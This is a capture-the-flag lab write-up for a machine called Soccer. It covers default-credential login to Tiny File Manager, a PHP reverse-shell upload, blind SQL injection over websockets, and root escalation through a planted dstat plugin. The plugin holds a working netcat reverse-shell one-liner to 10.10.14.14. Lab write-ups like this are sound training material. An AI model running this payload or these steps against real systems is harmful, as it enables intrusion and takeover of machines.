Soccer

Enumeration

Ports and Services

Software Installed:

• Tiny File Manager 2.4.3

Nmap Scan Results:

WFuzz Directory Search:

Initial Foothold

/tiny/

Following link at bottom end up on git hub page:
https://github.com/prasathmani/tinyfilemanager/blob/master/tinyfilemanager.php
Deafult username/passwords-
admin:admin@123
user:12345

Logged in as admin:

Version:

Uploaded test.php to uploads directory and opened php info:

Uploaded a php reverse shell and executed gaining a reverse shell

Found another webhost/subdomain:

soc-player.soccer.htb is a ticket system.
Appears to do ticket lookups via websockets:
http://soc-player.soccer.htb/

/signup is a generally signup page. Once signed up and logged in your given a ticket

/check:

/check

http://soc-player.soccer.htb:9091

The websockets is vulnerable to a sqli attack:
URL: https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket- automation.html

From the above url I used the poc:
Changed data = ‘“employeeID”:”%s”}’ % to
‘“id”:”%s”}’ %
The id string came from the source of /check:

Found credentials in accounts table in soccer_db:

SSH as player

**User.txt Proof Screenshot

**

User.txt Contents

Privilege Escalation

Linpeas.sh showed directory /usr/local/share/dstat is writable

There are no sudo rights for user however doas does:

Created a plugin (plugins must start with dstat_) dstat_pentest.py:

import os
os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 8888 >/tmp/f')

Put dstat_pentest.py in /usr/local/share/dstat directory
Ran dstat –list | grep pentest to ensure it sees it and ran dstat as root with the plugin:

RootScreenshot Here:

Root.txt Contents: